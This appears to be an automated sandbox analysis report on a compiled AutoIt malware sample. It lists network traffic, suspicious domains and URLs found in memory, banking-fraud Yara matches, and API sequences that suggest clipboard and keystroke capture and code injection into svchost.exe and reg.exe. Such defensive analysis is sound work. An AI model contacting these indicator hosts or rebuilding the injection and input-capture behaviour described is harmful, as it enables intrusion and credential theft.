                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 91e170ea6a674259-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1596&rtt_var=798&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=788&delivery_rate=0&cwnd=237&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Mon, 10 Mar 2025 08:28:55 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    x-turbo-charged-by: LiteSpeed
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=S9QGna9f%2B6RtmwD7zrpEaYtU20Dv%2BnJ1YjfJn2aKGmvYHMkxwTqTklXUiGPDoFY6ppO1n%2BgQEz24DquNGyo0BAvN9jYwGjfOgET7NrTcTO04QQpTY1VDJBRaPMifT4gkNYZV2Sjx"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 91e170fa8ad14258-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1555&min_rtt=1555&rtt_var=777&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=812&delivery_rate=0&cwnd=177&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Mon, 10 Mar 2025 08:28:57 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    x-turbo-charged-by: LiteSpeed
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SR6fl5TmSzOgcZ2lpyNsDH4zAGjzMs0PNimWg7ndSjgny4cjCYP9b8Mnlnu%2BXSqrUMJvdPZD0%2F3r1wJW996xuCnUePBhb7Pv09SzJtgo0cE9Lnr4P3hLMXpuNAp59vuIbquyughs"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 91e1710a6fe9dd37-EWR
                    Content-Encoding: gzip
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=2496&min_rtt=2496&rtt_var=1248&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=972&delivery_rate=0&cwnd=140&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Mon, 10 Mar 2025 08:29:00 GMT
                    Content-Type: text/html
                    Transfer-Encoding: chunked
                    Connection: close
                    cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                    pragma: no-cache
                    x-turbo-charged-by: LiteSpeed
                    cf-cache-status: DYNAMIC
                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=neypzKT3kIVBGdrTWLaS6hs1nZy4BddvgMcw6g6nOdjC4SJuFWCkfcEhStVMIJY9N8ik2IB3KUMqsIWOTBBoD2QHPsg4XKakTXp%2BEUoEdh4DLDBMgt6hsP1jeOL5x0qa7oStrgiA"}],"group":"cf-nel","max_age":604800}
                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                    Server: cloudflare
                    CF-RAY: 91e1711a59d042f7-EWR
                    alt-svc: h3=":443"; ma=86400
                    server-timing: cfL4;desc="?proto=TCP&rtt=1681&min_rtt=1681&rtt_var=840&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=532&delivery_rate=0&cwnd=148&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                    Data Ascii: 4e3<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sa
                Source: reg.exe, 00000004.00000002.3581535514.00000000047E0000.00000004.10000000.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.0000000004230000.00000004.00000001.00040000.00000000.sdmp
                    String found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: reg.exe, 00000004.00000002.3581535514.0000000004E28000.00000004.10000000.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.0000000004878000.00000004.00000001.00040000.00000000.sdmp
                    String found in binary or memory: http://digi-searches.com/px.js?ch=1
                Source: reg.exe, 00000004.00000002.3581535514.0000000004E28000.00000004.10000000.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.0000000004878000.00000004.00000001.00040000.00000000.sdmp
                    String found in binary or memory: http://digi-searches.com/px.js?ch=2
                Source: reg.exe, 00000004.00000002.3581535514.0000000004E28000.00000004.10000000.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.0000000004878000.00000004.00000001.00040000.00000000.sdmp
                    String found in binary or memory: http://digi-searches.com/sk-logabpstatus.php?a=OTBsRjBnODhKQm9QeHMvb2FBeXd1NXBROFBjbmhwQ2ZyV3h4L2pze
                Source: uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3583192639.0000000005964000.00000040.80000000.00040000.00000000.sdmp
                    String found in binary or memory: http://www.super-mist.store
                Source: uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3583192639.0000000005964000.00000040.80000000.00040000.00000000.sdmp
                    String found in binary or memory: http://www.super-mist.store/l6hh/
                Source: reg.exe, 00000004.00000002.3583745177.0000000007DCE000.00000004.00000020.00020000.00000000.sdmp
                    String found in binary or memory: https://ac.ecosia.org?q=
                Source: reg.exe, 00000004.00000002.3583745177.0000000007DCE000.00000004.00000020.00020000.00000000.sdmp
                    String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: reg.exe, 00000004.00000002.3583745177.0000000007DCE000.00000004.00000020.00020000.00000000.sdmp
                    String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: reg.exe, 00000004.00000002.3583745177.0000000007DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.0000000003A56000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: reg.exe, 00000004.00000002.3583745177.0000000007DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/?q=
                Source: reg.exe, 00000004.00000002.3583745177.0000000007DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: reg.exe, 00000004.00000002.3583745177.0000000007DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtabv20
                Source: reg.exe, 00000004.00000002.3583745177.0000000007DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://gemini.google.com/app?q=
                Source: reg.exe, 00000004.00000002.3579738318.000000000301B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: reg.exe, 00000004.00000002.3579738318.000000000301B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: reg.exe, 00000004.00000002.3579738318.000000000301B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: reg.exe, 00000004.00000002.3579738318.000000000301B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033
                Source: reg.exe, 00000004.00000002.3579738318.000000000301B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: reg.exe, 00000004.00000002.3579738318.000000000301B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: reg.exe, 00000004.00000003.1461349525.0000000007DA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: reg.exe, 00000004.00000002.3583745177.0000000007DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20
                Source: reg.exe, 00000004.00000002.3581535514.0000000005470000.00000004.10000000.00040000.00000000.sdmp, reg.exe, 00000004.00000002.3583643945.0000000006380000.00000004.00000800.00020000.00000000.sdmp, reg.exe, 00000004.00000002.3581535514.000000000464E000.00000004.10000000.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.0000000004EC0000.00000004.00000001.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.000000000409E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: reg.exe, 00000004.00000002.3583745177.0000000007DCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp
                Source: reg.exe, 00000004.00000002.3581535514.0000000004C96000.00000004.10000000.00040000.00000000.sdmp, uD8F5JGUDvEpNoCYQYtn.exe, 0000000D.00000002.3581258793.00000000046E6000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.utzp.top/d478/?SDCxHX=yZiSYoN2a3htTd2ewqQl0
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_00204164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00204164
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_00203F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_00203F66
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001F001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_001F001C
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_0021CABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0021CABC

                E-Banking Fraud

                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000004.00000002.3579520050.0000000002F00000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3583192639.0000000005910000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3579268739.0000000002C50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3579601950.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1260442665.0000000006120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1257841114.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3581016954.00000000027A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1258855778.0000000003D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

                System Summary

                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: This is a third-party compiled AutoIt script.0_2_00193B3A
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000000.1113315439.0000000000244000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_4f307dee-5
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exe, 00000000.00000000.1113315439.0000000000244000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_939abd7d-0
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_61ace4ff-a
                Source: F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_f1f46ea9-f
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042C8E3 NtClose,2_2_0042C8E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B60 NtClose,LdrInitializeThunk,2_2_03A72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03A72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A735C0 NtCreateMutant,LdrInitializeThunk,2_2_03A735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74340 NtSetContextThread,2_2_03A74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A74650 NtSuspendThread,2_2_03A74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BA0 NtEnumerateValueKey,2_2_03A72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72B80 NtQueryInformationFile,2_2_03A72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BE0 NtQueryValueKey,2_2_03A72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72BF0 NtAllocateVirtualMemory,2_2_03A72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AB0 NtWaitForSingleObject,2_2_03A72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AF0 NtWriteFile,2_2_03A72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72AD0 NtReadFile,2_2_03A72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FA0 NtQuerySection,2_2_03A72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FB0 NtResumeThread,2_2_03A72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F90 NtProtectVirtualMemory,2_2_03A72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72FE0 NtCreateFile,2_2_03A72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F30 NtCreateSection,2_2_03A72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72F60 NtCreateProcessEx,2_2_03A72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72EA0 NtAdjustPrivilegesToken,2_2_03A72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E80 NtReadVirtualMemory,2_2_03A72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72EE0 NtQueueApcThread,2_2_03A72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72E30 NtWriteVirtualMemory,2_2_03A72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DB0 NtEnumerateKey,2_2_03A72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72DD0 NtDelayExecution,2_2_03A72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D30 NtUnmapViewOfSection,2_2_03A72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D00 NtSetInformationFile,2_2_03A72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72D10 NtMapViewOfSection,2_2_03A72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CA0 NtQueryInformationToken,2_2_03A72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CF0 NtOpenProcess,2_2_03A72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72CC0 NtQueryVirtualMemory,2_2_03A72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C00 NtQueryInformationProcess,2_2_03A72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C60 NtCreateKey,2_2_03A72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A72C70 NtFreeVirtualMemory,2_2_03A72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73090 NtSetValueKey,2_2_03A73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73010 NtOpenDirectoryObject,2_2_03A73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A739B0 NtGetContextThread,2_2_03A739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73D10 NtOpenProcessToken,2_2_03A73D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A73D70 NtOpenThread,2_2_03A73D70
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D4340 NtSetContextThread,LdrInitializeThunk,4_2_034D4340
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D4650 NtSuspendThread,LdrInitializeThunk,4_2_034D4650
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2B60 NtClose,LdrInitializeThunk,4_2_034D2B60
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2BE0 NtQueryValueKey,LdrInitializeThunk,4_2_034D2BE0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_034D2BF0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_034D2BA0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2AD0 NtReadFile,LdrInitializeThunk,4_2_034D2AD0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2AF0 NtWriteFile,LdrInitializeThunk,4_2_034D2AF0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2F30 NtCreateSection,LdrInitializeThunk,4_2_034D2F30
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2FE0 NtCreateFile,LdrInitializeThunk,4_2_034D2FE0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2FB0 NtResumeThread,LdrInitializeThunk,4_2_034D2FB0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2EE0 NtQueueApcThread,LdrInitializeThunk,4_2_034D2EE0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_034D2E80
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2D10 NtMapViewOfSection,LdrInitializeThunk,4_2_034D2D10
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_034D2D30
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2DD0 NtDelayExecution,LdrInitializeThunk,4_2_034D2DD0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_034D2DF0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2C60 NtCreateKey,LdrInitializeThunk,4_2_034D2C60
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_034D2C70
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_034D2CA0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D35C0 NtCreateMutant,LdrInitializeThunk,4_2_034D35C0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D39B0 NtGetContextThread,LdrInitializeThunk,4_2_034D39B0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2B80 NtQueryInformationFile,4_2_034D2B80
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2AB0 NtWaitForSingleObject,4_2_034D2AB0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2F60 NtCreateProcessEx,4_2_034D2F60
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2F90 NtProtectVirtualMemory,4_2_034D2F90
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2FA0 NtQuerySection,4_2_034D2FA0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2E30 NtWriteVirtualMemory,4_2_034D2E30
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2EA0 NtAdjustPrivilegesToken,4_2_034D2EA0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2D00 NtSetInformationFile,4_2_034D2D00
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2DB0 NtEnumerateKey,4_2_034D2DB0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2C00 NtQueryInformationProcess,4_2_034D2C00
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2CC0 NtQueryVirtualMemory,4_2_034D2CC0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D2CF0 NtOpenProcess,4_2_034D2CF0
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D3010 NtOpenDirectoryObject,4_2_034D3010
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D3090 NtSetValueKey,4_2_034D3090
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D3D70 NtOpenThread,4_2_034D3D70
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_034D3D10 NtOpenProcessToken,4_2_034D3D10
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C79200 NtCreateFile,4_2_02C79200
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C79370 NtReadFile,4_2_02C79370
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C79670 NtAllocateVirtualMemory,4_2_02C79670
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C79460 NtDeleteFile,4_2_02C79460
                Source: C:\Windows\SysWOW64\reg.exeCode function: 4_2_02C79500 NtClose,4_2_02C79500
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001FA1EF: GetFullPathNameW,__swprintf,CreateDirectoryW,CreateFileW,_memset,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_001FA1EF
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001E8310 _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_001E8310
                Source: C:\Users\user\Desktop\F#U0130YAT #U0130STE#U011e#U0130 L#U0130STE.exeCode function: 0_2_001F51BD ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,0_2_001F51BD
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A2F1722_2_03A2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03B0B16B2_2_03B0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF70E92_2_03AF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF0E02_2_03AFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEF0CC2_2_03AEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A470C02_2_03A470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF7B02_2_03AFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF16CC2_2_03AF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADD5B02_2_03ADD5B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF75712_2_03AF7571
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFF43F2_2_03AFF43F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A314602_2_03A31460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5FB802_2_03A5FB80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB5BF02_2_03AB5BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A7DBF92_2_03A7DBF9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFB762_2_03AFFB76
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03ADDAAC2_2_03ADDAAC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A85AA02_2_03A85AA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AE1AA32_2_03AE1AA3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AEDAC62_2_03AEDAC6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AB3A6C2_2_03AB3A6C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AFFA492_2_03AFFA49
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AF7A462_2_03AF7A46
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03AD59102_2_03AD5910
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A499502_2_03A49950
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03A5B9502_2_03A5B950
